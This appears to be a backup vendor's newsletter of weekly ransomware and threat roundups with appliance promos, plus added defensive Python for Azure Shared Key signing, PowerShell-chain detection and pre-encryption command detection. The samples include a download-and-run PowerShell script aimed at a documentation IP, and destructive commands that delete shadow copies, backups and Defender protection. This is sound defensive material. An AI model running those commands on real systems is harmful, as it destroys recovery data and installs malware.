
Weekly

Ransomware Roundup

Apr 24 - 28, 2023

Critical RCE Authentication Flaws Affect APC UPS Software

Critical vulnerabilities in APC's Easy UPS Online Monitoring Software let an unauthenticated remote attacker take over the monitoring host and the UPS devices it manages. CVE-2023-29411 is a missing-authentication flaw that leads to remote code execution, CVE-2023-29412 is improper handling of case sensitivity that also leads to remote code execution, and CVE-2023-29413 is a missing-authentication flaw that leads to denial of service. Easy UPS Online Monitoring Software v2.5-GA-01-22320 and earlier is affected on Windows 10 and 11 and on Windows Server 2016, 2019, and 2022. Users are advised to upgrade to V2.5-GS-01-23036 and to disable "program" mode. Read more

Lazarus Subgroup BlueNoroff Deploys RustBucket Malware on Apple Devices

BlueNoroff, a subgroup of North Korea's Lazarus Group, is using new macOS malware dubbed RustBucket to steal sensitive data and stage further payloads on victims' Macs. The malware arrives as an application disguised as an "Internal PDF Viewer"; the viewer behaves normally until a specific lure PDF is opened in it, at which point it decodes and runs the embedded malicious code, a design that keeps the payload inert under casual inspection and sandbox analysis. The group distributes the malware with job-themed lures and retrieves a second-stage payload from a remote server. Read more

New Zero-Day Exploits Allow Remote Code Execution on Chrome and Edge

Google has warned users to update Chrome after two vulnerabilities were found being exploited in the wild; Microsoft Edge, which shares the Chromium code base, needs the same update. CVE-2023-2033 is a type confusion bug in the V8 JavaScript engine, and CVE-2023-2136 is an integer overflow in the Skia graphics library. Chained, such bugs let a crafted web page execute code remotely and escape the browser sandbox. Read more

Chinese Threat Group Gallium Uses PingPull and Sword2033 Malware for Espionage

The Chinese threat group Gallium, also tracked as Alloy Taurus, is using two Linux malware tools, a Linux variant of its PingPull remote access trojan and a new backdoor named Sword2033, in cyberespionage operations against targets in South Africa and Nepal. PingPull receives its tasking from the attackers' C2 server through different HTTP parameters, while Sword2033 communicates with the same C2 infrastructure, runs commands and uploads and downloads files, which lets it exfiltrate sensitive documents for espionage. Read more

How to Calculate and Improve Recovery Time and Point Objectives

Recovery time objective (RTO) is the maximum time a service may stay down after a disruption; recovery point objective (RPO) is the maximum acceptable data loss, measured as the time between the last recoverable backup and the incident. This blog post explains why both matter, how to calculate them from business impact and backup frequency, and what measures bring them down, and it stresses a tested disaster recovery plan so that unforeseen disruptions do not halt the business. Read more

Point32Health Confirms Ransomware Attack, Service Disruption for Health Insurance Customers

Point32Health, a health insurer, has confirmed a ransomware attack on its IT systems that disrupted services for its members. Customer data was targeted; the identity of the attackers and the ransomware family involved have not been disclosed. Law enforcement and outside cybersecurity experts have been engaged. Read more

Promo
98TB Immutable & Air-Gapped Veeam Backup & DR appliance with 10 Veeam Backup Essential licenses for $9,995

98TB Fully Air Gapped and Immutable Veeam Backup and DR appliance with 10 Veeam Backup Essentials Annual Subscription License for $9,995.

10th Gen, 8-bay 2U Rackmount unit with 7x14TB (98TB) Enterprise SAS drives, 10 core Storage Virtualization Engine, 32GB System Memory, 512GB NVMe SSD, Redundant Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller, Dual 10Gb RJ-45 Ports, Fully Integrated SAN, NAS and optional S3 cloud storage.

All Enterprise Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.

For appliance demos, specifications, and quotes contact us.


Weekly

Ransomware Roundup

Apr 10 - 14, 2023

Microsoft Traces Azure Wiper Attacks to Iranian APTs MuddyWater and DEV-1084

Microsoft has attributed destructive attacks on the Azure and on-premises environments of Middle Eastern entities to the Iranian actor MuddyWater (which Microsoft tracks as Mercury) working with a second group it calls DEV-1084. The attackers exploited vulnerable internet-exposed devices, created admin accounts, deployed web shells and backdoors, and stole credentials. With a compromised Azure Active Directory account holding Global Administrator privileges they mass-deleted cloud resources, causing data loss and denial of service; on-premises they used Group Policy Objects to push DarkBit ransomware and exfiltrated data from mailboxes. The US government has officially tied MuddyWater to Iran's Ministry of Intelligence and Security; Microsoft assesses that DEV-1084 operated in partnership with it. Read more

Ichitaro Word Processor Found to Have Critical Security Vulnerabilities by Experts

The Japanese word processor Ichitaro has four vulnerabilities that allow arbitrary code execution: each is a memory-corruption bug triggered by opening a specially crafted document, giving an attacker control of the user's system. JustSystems has issued fixes for Ichitaro 2021, 2022, and 2023, the Ichitaro 2022 trial version, and Ichitaro Viewer. JPCERT/CC has warned that other JustSystems products may also be affected. Read more

Orca Warns of Microsoft Azure Shared Key Authorization Exploitation

Orca has warned that Azure Storage Shared Key authorization, a weaker mechanism than Azure Active Directory authorization because the account key grants full, non-attributable access to the entire storage account and cannot be scoped to a role or made to expire, is abusable for data theft and code execution. An identity allowed to list a storage account's access keys, a permission several built-in roles carry, can use the key to read and modify everything in the account, including critical business assets, and, where the account holds the code of Azure Functions, swap in attacker code that runs with the function's identity. Orca recommends disabling Shared Key authorization on storage accounts altogether. Read more
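To make concrete why possession of the key is the whole problem, here is an added example (not Orca's research code or Microsoft's SDK) that computes an Azure Storage Shared Key Authorization header the way Microsoft's documented scheme for the Blob, Queue and File services does: a canonical string of the request is HMAC-SHA256'd with the base64-decoded account key. There is no identity, scope or expiry in the signature, so a leaked key signs a container DELETE exactly as well as a GET. The account name and key are constructed test values and the storage service is never contacted.

```python
"""Added example (not Orca's or Microsoft's code): how an Azure Storage Shared Key
Authorization header is computed from the account key, following Microsoft's
documented Shared Key scheme for the Blob/Queue/File services. Holding the key is
all the 'authentication' there is, so a leaked key signs any operation on the
account, including the DELETE shown in demo(). Account name and key are constructed
test values; the storage service itself is not contacted."""
import base64
import hashlib
import hmac

ACCOUNT = "contosostorage"                              # constructed account name
ACCOUNT_KEY = base64.b64encode(b"\x01" * 64).decode()   # constructed 512-bit key

# Standard headers, in the exact order the service concatenates them.
_STD_HEADERS = ["Content-Encoding", "Content-Language", "Content-Length",
                "Content-MD5", "Content-Type", "Date", "If-Modified-Since",
                "If-Match", "If-None-Match", "If-Unmodified-Since", "Range"]


def string_to_sign(verb, headers, path, query=None, account=ACCOUNT):
    """Build the canonical StringToSign that the service will reconstruct."""
    lower = {k.lower(): str(v) for k, v in headers.items()}
    std = []
    for h in _STD_HEADERS:
        v = lower.get(h.lower(), "")
        if h == "Content-Length" and v == "0":   # empty for zero-length bodies (2015-02-21+)
            v = ""
        std.append(v)
    # Canonicalized x-ms-* headers: lowercase names, sorted, one "name:value" per line.
    xms = [f"{k}:{lower[k]}" for k in sorted(lower) if k.startswith("x-ms-")]
    # Canonicalized resource: /account/path, then each query parameter on its own line.
    res = f"/{account}{path}"
    for k in sorted(query or {}, key=str.lower):
        res += f"\n{k.lower()}:{query[k]}"
    return "\n".join([verb.upper(), *std, *xms, res])


def shared_key_header(verb, headers, path, query=None, key=ACCOUNT_KEY, account=ACCOUNT):
    """Authorization header value: 'SharedKey <account>:<base64(HMAC-SHA256)>'."""
    sts = string_to_sign(verb, headers, path, query, account)
    mac = hmac.new(base64.b64decode(key), sts.encode("utf-8"), hashlib.sha256).digest()
    return f"SharedKey {account}:{base64.b64encode(mac).decode()}"


def verify(header, verb, headers, path, query=None, key=ACCOUNT_KEY, account=ACCOUNT):
    """What the service does: recompute with the stored key and compare in constant time."""
    expected = shared_key_header(verb, headers, path, query, key, account)
    return hmac.compare_digest(header, expected)


def demo():
    """A leaked key signs a container DELETE just as well as it signs a GET."""
    hdrs = {"x-ms-date": "Mon, 24 Apr 2023 10:00:00 GMT",
            "x-ms-version": "2020-10-02", "Content-Length": "0"}
    query = {"restype": "container"}
    auth = shared_key_header("DELETE", hdrs, "/backups", query)
    return {
        "authorization": auth,
        "accepted": verify(auth, "DELETE", hdrs, "/backups", query),
        # The same header replayed with a different verb fails the check:
        # the signature binds the request, not an identity.
        "replay_as_get": verify(auth, "GET", hdrs, "/backups", query),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The mitigation Orca recommends maps to one property on the storage account: `az storage account update -n <account> -g <resource-group> --allow-shared-key-access false`, and `az storage account show -n <account> -g <resource-group> --query allowSharedKeyAccess` lets you audit the fleet for accounts where it is still true.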

Nokoyawa Ransomware Deployed Using Windows Zero-Day Exploit

Cybercriminals have been exploiting CVE-2023-28252 in a series of ransomware attacks. The flaw is an elevation-of-privilege bug in the Windows Common Log File System (CLFS) driver that lets a local attacker gain SYSTEM privileges; the same group has used several similar but distinct CLFS exploits before. The attackers use the exploit to deploy Nokoyawa ransomware, which encrypts files and threatens to leak stolen data unless a ransom is paid. The operators behind Nokoyawa have ties to the Karma and Nemty ransomware families and to the Hive operation. Read more

Azure Backup vs AWS Backup: Which Cloud Backup Solution is More Secure

Both Azure Backup and AWS Backup offer robust security features that meet industry standards, but they differ on several factors that matter for backups: encryption of data at rest and in transit, access control, compliance certifications, and backup and recovery options. This blog explores these factors in depth to help you decide which provider best fits your organization's cloud backup needs. Read more

Phishing Campaign Targets Accounting and Tax Return Firms to Deploy Remcos RAT

Microsoft has warned of a phishing campaign targeting accounting firms and tax preparers. It begins with emails that appear to come from clients sending documents needed to complete their tax returns. The attachments look like tax forms in PDF format but are Windows shortcut (.lnk) files in disguise. Opening one runs PowerShell, which downloads an obfuscated VBS file; that script fetches a decoy PDF and runs the GuLoader loader, which installs the Remcos remote access trojan on the victim's machine. Read more
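The chain above (shortcut, hidden PowerShell, download, script host) leaves a recognisable parent/child and command-line pattern in process-creation telemetry. The following is an added example, not Microsoft's detection content, that evaluates constructed process-creation records against that pattern and decodes `-EncodedCommand` payloads, which PowerShell expects as base64 over UTF-16LE. The record shape (pid, image, parent_image, cmdline) is an assumed EDR/Sysmon-like layout, the events are constructed for the example, and 198.51.100.7 is a documentation address.

```python
"""Added example (not Microsoft's detection content): spot the LNK -> hidden
PowerShell -> download -> wscript chain in process-creation records, and decode
-EncodedCommand payloads (base64 over UTF-16LE). All records below are constructed;
the field names are an assumed EDR/Sysmon-like shape, and 198.51.100.7 is a
documentation (TEST-NET-2) address."""
import base64
import re


def encode_ps(script):
    """Produce what -EncodedCommand expects, so the sample matches real tooling."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -e/-ec/-enc/-EncodedCommand."""
    # Alternatives are followed by whitespace, so -ExecutionPolicy does not match -e.
    m = re.search(r"(?i)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


HIDDEN = re.compile(r"(?i)-(?:w|win|windowstyle)\s+hidden|-nop\b|-noni\b|-ep\s+bypass|-executionpolicy\s+bypass")
CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def _basename(p):
    return p.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return the reasons a single process-creation record is suspicious (empty if none)."""
    image, parent, cmd = _basename(ev["image"]), _basename(ev["parent_image"]), ev["cmdline"]
    reasons = []
    decoded = decode_encoded_command(cmd)
    visible = cmd + ("\n" + decoded if decoded else "")   # match on the decoded text too
    if image in POWERSHELL:
        if parent == "explorer.exe" and HIDDEN.search(cmd):
            reasons.append("hidden/bypass PowerShell spawned by explorer.exe (user opened a file, e.g. a .lnk)")
        if decoded is not None:
            reasons.append("-EncodedCommand payload decodes to: " + decoded[:70])
        if CRADLE.search(visible):
            reasons.append("download cradle in (decoded) command line")
    if image in SCRIPT_HOSTS and parent in POWERSHELL and re.search(r"(?i)\.vbs?\b", cmd):
        reasons.append("script host launched by PowerShell on a .vbs file (second stage)")
    return reasons


def triage(events):
    """Map pid -> reasons for every record that tripped at least one rule."""
    return {ev["pid"]: r for ev in events if (r := evaluate(ev))}


# Constructed stage-1 script, mirroring the chain in the article (download a VBS, run it).
STAGE1 = ("$c = New-Object Net.WebClient; "
          "$c.DownloadFile('http://198.51.100.7/tax/return.vbs', 'C:\\Users\\Public\\return.vbs'); "
          "wscript.exe C:\\Users\\Public\\return.vbs")

SAMPLE_EVENTS = [  # constructed records; two malicious, two benign
    {"pid": 1001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc " + encode_ps(STAGE1)},
    {"pid": 1002, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"wscript.exe C:\Users\Public\return.vbs"},
    {"pid": 2001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"pid": 2002, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

The decoded payload is the part worth keeping in the alert: the base64 blob hides the download URL and the dropped path, and those are what an analyst pivots on.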

Promo
192TB Immutable & Air-Gapped Veeam Backup & DR appliance with 20 Veeam Backup Essential licenses for $15,995

192TB Fully Air Gapped and Immutable Veeam Backup and DR appliance with 20 Veeam Backup Essential Annual Subscription Licenses for $15,995.

10th Gen, 12-bay 2U Rackmount unit with 12x16TB (192TB) Enterprise SAS drives, 10 Core Storage Virtualization Engine, 32GB System Memory, 512GB NVMe SSD, Redundant Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller, Dual 10Gb RJ-45 Ports, Fully Integrated SAN, NAS and optional S3 cloud storage.

All Enterprise Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.

For appliance demos, specifications, and quotes contact us.


Weekly

Ransomware Roundup

Apr 3 - 7, 2023

AlienFox Strikes the Cloud: Credentials for 18 Services Stolen by New Toolkit

The AlienFox toolkit can steal cloud credentials for 18 different services. Its data-extraction scripts probe misconfigured servers for sensitive configuration files, such as web framework .env files, holding account credentials, API keys, and authentication tokens. It exploits CVE-2022-31279, a deserialization flaw in the Laravel PHP framework, parses the files it retrieves for credentials, validates them against the corresponding services, and attempts SSH logins with the Paramiko Python library. Read more

Lazarus Group Supply Chain Attack Targets 3CX VoIP Company and Cryptocurrency Firms

The Lazarus Group trojanized the 3CX desktop VoIP application in a supply chain attack and, on a small number of the 3CX customers that received it, including several cryptocurrency firms, dropped the Gopuram backdoor as a second stage. Gopuram can harvest credentials, install further backdoors, and download additional payloads. The multi-stage infection chain, which includes DLL sideloading, helped the malware evade traditional security tools. Read more

NATO Nations at Risk: CISA Alerts of Zimbra Bug Exploitation

CISA has directed federal agencies to address a security flaw in Zimbra Collaboration (ZCS) that Russian-aligned hackers are exploiting to read the mailboxes of government officials. The Winter Vivern group used a vulnerability scanner to find exposed ZCS servers, sent phishing emails to their users, and exploited CVE-2022-27926, a reflected cross-site scripting flaw, so that attacker JavaScript ran in the victim's webmail session and stole credentials and CSRF tokens. CISA has added the vulnerability to its Known Exploited Vulnerabilities catalog and directed federal agencies to patch it by April 24. Read more

ALPHV Ransomware Affiliate Exploits Veritas Backup Exec Flaws for Network Intrusion

An ALPHV ransomware affiliate tracked as UNC4466 has been exploiting vulnerabilities in Veritas Backup Exec to gain initial access to target networks. Rather than the stolen credentials typical of ALPHV affiliates, UNC4466 gains access to internet-facing Windows servers running the Backup Exec agent using a publicly available Metasploit module. The attacker then uses Advanced IP Scanner and ADRecon to map the compromised environment. Read more

Safeguarding Your Data: Best Practices for Secure Cloud Storage

Cloud storage provides convenience and flexibility, but it also brings a range of security challenges, and decision makers need to understand how to implement and manage enterprise cloud storage effectively. This post collects practical tips and best practices that let an organization get the benefits of cloud storage without giving up enterprise security. Read more

New Ransomware Gang ‘Money Message’ Demands Million-Dollar Ransoms

The "Money Message" ransomware gang is targeting businesses worldwide and uses several initial access methods: exploiting exposed remote desktop services, spear-phishing emails, and pushing malware through a third-party service provider's software update mechanism. Once inside, the operators move laterally through the network, disable backup systems, delete Volume Shadow Copies, and stop selected processes and Windows services to evade detection and free files for encryption. Ransom demands range from tens of thousands to millions of dollars. Read more
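The pre-encryption steps above (backups disabled, shadow copies deleted, services stopped) are the last noisy moment before files are encrypted, and they are almost always done with the same handful of built-in commands. The following is an added example, not taken from the Money Message reporting, that classifies command lines against those behaviours and tags each hit with its public MITRE ATT&CK technique ID. The command lines are constructed samples, and the service-name keyword list in the Service Stop rule is a starting point, not a complete inventory.

```python
"""Added example (not from the Money Message reporting): classify process command
lines for the pre-encryption impact stage, i.e. backups disabled, shadow copies
removed and backup/database/security services stopped. Command lines below are
constructed samples; technique IDs are the public MITRE ATT&CK identifiers for
these behaviours. The service keywords in the T1489 rule are a starting list."""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    technique: str
    title: str
    command: str


RULES = [
    ("T1490", "Inhibit System Recovery: shadow copies deleted",
     r"(?i)vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete|Win32_ShadowCopy.*\.Delete\(\)"),
    ("T1490", "Inhibit System Recovery: shadow storage shrunk to purge old copies",
     r"(?i)vssadmin(?:\.exe)?\s+resize\s+shadowstorage.*/maxsize="),
    ("T1490", "Inhibit System Recovery: backup catalog deleted or Windows recovery disabled",
     r"(?i)wbadmin(?:\.exe)?\s+delete\s+(?:catalog|systemstatebackup)"
     r"|bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("T1489", "Service Stop: backup, database or security service stopped",
     r"(?i)(?:net1?(?:\.exe)?\s+stop|sc(?:\.exe)?\s+stop|Stop-Service\s+(?:-Name\s+)?)"
     r"\s*\"?(?:veeam|vss|sql|backup|msexchange|sophos|mcafee|windefend)\S*"),
    ("T1562.001", "Impair Defenses: Defender real-time monitoring disabled",
     r"(?i)Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$?true"),
]
COMPILED = [(tid, title, re.compile(rx)) for tid, title, rx in RULES]


def classify(cmdline):
    """All rules a single command line trips; one command can trip several."""
    return [Finding(tid, title, cmdline) for tid, title, rx in COMPILED if rx.search(cmdline)]


def scan(cmdlines):
    """Flatten findings across a batch of command lines (e.g. one host, one hour)."""
    findings = []
    for c in cmdlines:
        findings.extend(classify(c))
    return findings


def summary(findings):
    """Technique -> count. Several T1490 hits on one host in minutes is the signal,
    since legitimate admins rarely delete shadows, catalog and recovery together."""
    return dict(Counter(f.technique for f in findings))


SAMPLE_COMMANDS = [  # constructed
    "vssadmin.exe delete shadows /all /quiet",
    "wmic shadowcopy delete",
    "wbadmin delete catalog -quiet",
    "bcdedit /set {default} recoveryenabled No",
    'net stop "VeeamBackupSvc" /y',
    'powershell -c "Stop-Service -Name SQLSERVERAGENT -Force"',
    'powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"',
    "vssadmin list shadows",   # benign: an admin listing snapshots
    "net stop Spooler",        # benign: unrelated service
]

if __name__ == "__main__":
    found = scan(SAMPLE_COMMANDS)
    for f in found:
        print(f"{f.technique:10} {f.title:75} {f.command}")
    print(summary(found))
```

Running the block on the samples yields seven findings and no hits on the two benign lines; wiring `summary()` to a threshold (for example, two or more distinct T1490 titles from one host within a few minutes) turns a noisy command-line rule into an actionable pre-encryption alert.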

Promo
70TB $7,995 Air-Gapped & Immutable Veeam, Rubrik, Commvault, Site recovery Backup & DR appliance

70TB, expandable up to 4PB, Air-gapped & Immutable Veeam, Rubrik, Commvault, Site Recovery, Backup and DR appliance with Object Lockdown Technology for Ransomware protection for $7,995.

8-bay 2U Rackmount unit with 5x14TB Enterprise SAS drives, 10 Core Storage Virtualization Engine, 32GB System Memory, 512GB NVMe SSD, Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller. Fully Integrated SAN, NAS and Native S3 cloud object storage.

All Enterprise Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are included.

For appliance demos, specifications, and quotes contact us.
